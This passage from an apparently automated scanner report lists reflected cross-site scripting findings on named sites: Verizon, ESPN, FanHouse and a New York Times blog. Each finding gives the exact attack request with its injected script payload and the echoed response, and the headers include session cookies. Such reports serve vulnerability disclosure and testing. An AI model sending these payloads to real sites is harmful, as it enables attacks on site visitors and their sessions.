Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; vzAppID=; V347=CT-2; LOB_CATEGORY=; Product=A; ProductXML=A; vzpers=STATE=TX; vzapps=STATE=TX; ED_SESSIONID=KxTbMnyP2zr9LhVwBk93rzd6dKK0TBqL2ZNYgJg4qC0TFgJwDMP5!2085112158!-2093491878; pref_lang=en-US; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; CP=null*; BusinessUnit=business
Content-Length: 481

serviceType=ANY&fVZTState=&route=validateService&state=&serviceId=1ea0c'%3balert(1)//5fb68b88c27&securityCheck=validated&state=&select=serialCircuit&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&fState=&textfield=&textfield=&textfie
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 02:16:05 GMT
Connection: keep-alive
Content-Length: 55599


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<li
...[SNIP]...
="hide";
       document.getElementById("linkShow").className="show";
       document.getElementById("linkHide").className="hide"
       
   }
   function ticketdata_func()
   {        
       ticket_data = 'Service_id: '+'1EA0C';ALERT(1)//5FB68B88C27';
       
       aims_setExtraCustomerInfo('EMTS_TICKET_INFO',ticket_data);
   }    

function MM_findObj(n, d) { //v4.01
var p,i,x;
if(!d)
d=document;
if((p=n.index
...[SNIP]...

2.373. https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketMainDispatch.do [serviceType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/default/irepair/QuickTicketMainDispatch.do

Issue detail

The value of the serviceType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 248ca"><img%20src%3da%20onerror%3dalert(1)>b84734f6a04 was submitted in the serviceType parameter. This input was echoed as 248ca"><img src=a onerror=alert(1)>b84734f6a04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /enterprisesolutions/default/irepair/QuickTicketMainDispatch.do?route=evaluateServiceId HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
Cache-Control: max-age=0
Origin: https://enterprisecenter.verizon.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; vzAppID=; V347=CT-2; LOB_CATEGORY=; Product=A; ProductXML=A; vzpers=STATE=TX; vzapps=STATE=TX; ED_SESSIONID=KxTbMnyP2zr9LhVwBk93rzd6dKK0TBqL2ZNYgJg4qC0TFgJwDMP5!2085112158!-2093491878; pref_lang=en-US; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; CP=null*; BusinessUnit=business
Content-Length: 481

serviceType=ANY248ca"><img%20src%3da%20onerror%3dalert(1)>b84734f6a04&fVZTState=&route=validateService&state=&serviceId=%27&securityCheck=validated&state=&select=serialCircuit&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&textf
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 02:14:12 GMT
Connection: keep-alive
Content-Length: 37554


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<li
...[SNIP]...
<input id = "savedServiceType" class="hide" value="ANY248ca"><img src=a onerror=alert(1)>b84734f6a04"/>
...[SNIP]...

2.374. https://espanol.vzw.com/enes/sdmyaccount/clp/login [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://espanol.vzw.com
Path:   /enes/sdmyaccount/clp/login

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 567cb"><script>alert(1)</script>70931e25370 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enes/sdmyaccount/clp/login?567cb"><script>alert(1)</script>70931e25370=1 HTTP/1.1
Host: espanol.vzw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 15751
Content-Type: text/html;charset=UTF-8
Content-Language: en
Expires: 0
Server: Microsoft-IIS/7.0
X-dsameversion: 7 2005Q4 patch 120954-09
Am_client_type: genericHTML
Set-cookie: JSESSIONID=386D68CC647ED8C8BB6FD8D9658FD49C; path=/
Set-cookie: acProd=AQIC5wM2LY4SfcwhZtALZ0A4hEDrWDZKyNATDUNBkunR5bY%3D%40AAJTSwAJOTE0Njg2MzE4AAJTSQACNDAAAlMxAAJzMw%3D%3D%23; path=/; secure
Set-cookie: acProd=AQIC5wM2LY4SfcwhZtALZ0A4hEDrWDZKyNATDUNBkunR5bY%3D%40AAJTSwAJOTE0Njg2MzE4AAJTSQACNDAAAlMxAAJzMw%3D%3D%23; path=/; secure
Set-cookie: pasta=s3; path=/; secure
Set-cookie: pasta=s3; path=/; secure
Set-cookie: GLOBALID=UnkekTTBMrWUl%252FCs92wlfrGzCWDYQ3BoCI7k0oYQJa5oH6jCeZTnkGRuZEhV%252FMOu; expires=Mon, 21-Nov-2011 20:17:53 GMT; path=/
Set-Cookie: NSC_mphjo_hwt=ffffffffa17b3d6c45525d5f4f58455e445a4a420000; path=/; secure
Date: Sun, 21 Nov 2010 20:16:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="es" xml:
...[SNIP]...
<input type="hidden" name="goto" value="https://espanol.vzw.com/enes/sdmyaccount/clp/login?567cb"><script>alert(1)</script>70931e25370=1" />
...[SNIP]...

2.375. http://espn.go.com/espn3/index/_/sport/golf [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /espn3/index/_/sport/golf

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36f56"><img%20src%3da%20onerror%3dalert(1)>19d63a1b671 was submitted in the REST URL parameter 5. This input was echoed as 36f56"><img src=a onerror=alert(1)>19d63a1b671 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /espn3/index/_/sport/golf36f56"><img%20src%3da%20onerror%3dalert(1)>19d63a1b671 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sun, 21 Nov 2010 20:24:09 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sun, 21 Nov 2010 20:24:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN20
Set-Cookie: SWID=99707621-6371-4564-AA80-24FFF7825266; path=/; expires=Sun, 21-Nov-2030 20:24:06 GMT; domain=.go.com;
Cache-Expires: Sun, 21 Nov 2010 20:32:26 GMT
Content-Length: 823110
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <meta http
...[SNIP]...
<meta name="description" CONTENT="Enjoy live streaming Golf36f56"><img src=a onerror=alert(1)>19d63a1b671 online on ESPN3.com. Never miss a game!" />
...[SNIP]...

2.376. http://espn.go.com/espn3/index/_/sport/golf [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://espn.go.com
Path:   /espn3/index/_/sport/golf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35b3a'%3b77e0131ef0c was submitted in the REST URL parameter 5. This input was echoed as 35b3a';77e0131ef0c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /espn3/index/_/sport/golf35b3a'%3b77e0131ef0c HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sun, 21 Nov 2010 20:24:43 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sun, 21 Nov 2010 20:24:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN32
Set-Cookie: SWID=59EB7482-51C5-4D60-BBAC-A0CD39499D54; path=/; expires=Sun, 21-Nov-2030 20:24:43 GMT; domain=.go.com;
Cache-Expires: Sun, 21 Nov 2010 20:33:03 GMT
Content-Length: 822970
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <meta http
...[SNIP]...
<script type="text/javascript">
           anTrackESPN3(0,'espn3',ud.name,'','','index','index',ud.name,'','en','golf35b3a';77e0131ef0c','');
           
           
       </script>
...[SNIP]...

2.377. http://fanhouse.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ba02"-alert(1)-"fc12369cc9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?1ba02"-alert(1)-"fc12369cc9f=1 HTTP/1.1
Host: fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 20:14:42 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999905
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 78166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
com,mmafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="Fanhouse Main";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://www.fanhouse.com/?1ba02"-alert(1)-"fc12369cc9f=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.378. http://fanhouse.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f763a"><script>alert(1)</script>ca98355ab55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?f763a"><script>alert(1)</script>ca98355ab55=1 HTTP/1.1
Host: fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 20:14:23 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999971
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 78239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
<link rel="canonical" href="http://www.fanhouse.com/?f763a"><script>alert(1)</script>ca98355ab55=1"/>
...[SNIP]...

2.379. http://fantasyfootball.fanhouse.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fantasyfootball.fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5835"-alert(1)-"36c0b79af88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?c5835"-alert(1)-"36c0b79af88=1 HTTP/1.1
Host: fantasyfootball.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 20:16:10 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999908
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 65298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="Fantasy Football";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://fantasyfootball.fanhouse.com/?c5835"-alert(1)-"36c0b79af88=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.380. http://fantasyfootball.fanhouse.com/2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fantasyfootball.fanhouse.com
Path:   /2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de76e"-alert(1)-"eb79e86bb4f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2010/11/19de76e"-alert(1)-"eb79e86bb4f/injury-spin-cycle-matt-schaub-practices-expected-to-start/ HTTP/1.1
Host: fantasyfootball.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 02:28:40 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sun, 22-Nov-2009 02:28:39 GMT; path=/
Keep-Alive: timeout=5, max=999875
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 71450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
rts.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="Fantasy Football";
s_265.prop2="Article";
s_265.prop9="bsd:19725868";
s_265.prop12="http://fantasyfootball.fanhouse.com/2010/11/19de76e"-alert(1)-"eb79e86bb4f/injury-spin-cycle-matt-schaub-practices-expected-to-start/";
s_265.prop17="injury-spin-cycle-matt-schaub-practices-expected-to-start";
s_265.prop19="tom-lorenzo";
s_265.prop22="StubHub";
s_265.prop21=
...[SNIP]...

2.381. http://fantasyfootball.fanhouse.com/2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fantasyfootball.fanhouse.com
Path:   /2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff1f"%20a%3db%200324f86cdf4 was submitted in the REST URL parameter 3. This input was echoed as aff1f" a=b 0324f86cdf4 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /2010/11/19aff1f"%20a%3db%200324f86cdf4/injury-spin-cycle-matt-schaub-practices-expected-to-start/ HTTP/1.1
Host: fantasyfootball.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 20:25:30 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 21-Nov-2009 20:25:29 GMT; path=/
Keep-Alive: timeout=5, max=999922
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 71333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="referer" value="http://fantasyfootball.fanhouse.com:1080/2010/11/19aff1f" a=b 0324f86cdf4/injury-spin-cycle-matt-schaub-practices-expected-to-start/">
...[SNIP]...

2.382. http://fantasyfootball.fanhouse.com/2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fantasyfootball.fanhouse.com
Path:   /2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfe87"-alert(1)-"7e1929c554c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/?cfe87"-alert(1)-"7e1929c554c=1 HTTP/1.1
Host: fantasyfootball.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 20:17:27 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 21-Nov-2009 20:17:26 GMT; path=/
Keep-Alive: timeout=5, max=999996
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 71342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
265.prop1="Fantasy Football";
s_265.prop2="Article";
s_265.prop9="bsd:19725868";
s_265.prop12="http://fantasyfootball.fanhouse.com/2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/?cfe87"-alert(1)-"7e1929c554c=1";
s_265.prop17="injury-spin-cycle-matt-schaub-practices-expected-to-start";
s_265.prop19="tom-lorenzo";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document
...[SNIP]...

2.383. http://fantasyfootball.fanhouse.com/2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fantasyfootball.fanhouse.com
Path:   /2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2452e"><script>alert(1)</script>055ea28ba9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/?2452e"><script>alert(1)</script>055ea28ba9b=1 HTTP/1.1
Host: fantasyfootball.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 20:17:03 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 21-Nov-2009 20:17:02 GMT; path=/
Keep-Alive: timeout=5, max=999990
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 71417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://fantasyfootball.fanhouse.com/2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/?2452e"><script>alert(1)</script>055ea28ba9b=1"/>
...[SNIP]...

2.384. http://fantasyfootball.fanhouse.com/2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/ [synd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fantasyfootball.fanhouse.com
Path:   /2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/

Issue detail

The value of the synd request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb6e4"><script>alert(1)</script>45303352c52 was submitted in the synd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/?synd=1bb6e4"><script>alert(1)</script>45303352c52 HTTP/1.1
Host: fantasyfootball.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 20:17:42 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 21-Nov-2009 20:17:41 GMT; path=/
Keep-Alive: timeout=5, max=999943
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 71431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://fantasyfootball.fanhouse.com/2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/?synd=1bb6e4"><script>alert(1)</script>45303352c52"/>
...[SNIP]...

2.385. http://fantasyfootball.fanhouse.com/2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/ [synd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fantasyfootball.fanhouse.com
Path:   /2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/

Issue detail

The value of the synd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a379b"-alert(1)-"56907025966 was submitted in the synd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/?synd=1a379b"-alert(1)-"56907025966 HTTP/1.1
Host: fantasyfootball.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 20:19:41 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 21-Nov-2009 20:19:40 GMT; path=/
Keep-Alive: timeout=5, max=999886
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 71359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
op1="Fantasy Football";
s_265.prop2="Article";
s_265.prop9="bsd:19725868";
s_265.prop12="http://fantasyfootball.fanhouse.com/2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/?synd=1a379b"-alert(1)-"56907025966";
s_265.prop17="injury-spin-cycle-matt-schaub-practices-expected-to-start";
s_265.prop19="tom-lorenzo";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.w
...[SNIP]...

2.386. http://fifthdown.blogs.nytimes.com/2010/11/19/at-home-jets-look-for-noise-and-hope-to-roar/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fifthdown.blogs.nytimes.com
Path:   /2010/11/19/at-home-jets-look-for-noise-and-hope-to-roar/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3d6a"><script>alert(1)</script>9cfad63d4c0 was submitted in the src parameter. This input was echoed as a3d6a\"><script>alert(1)</script>9cfad63d4c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

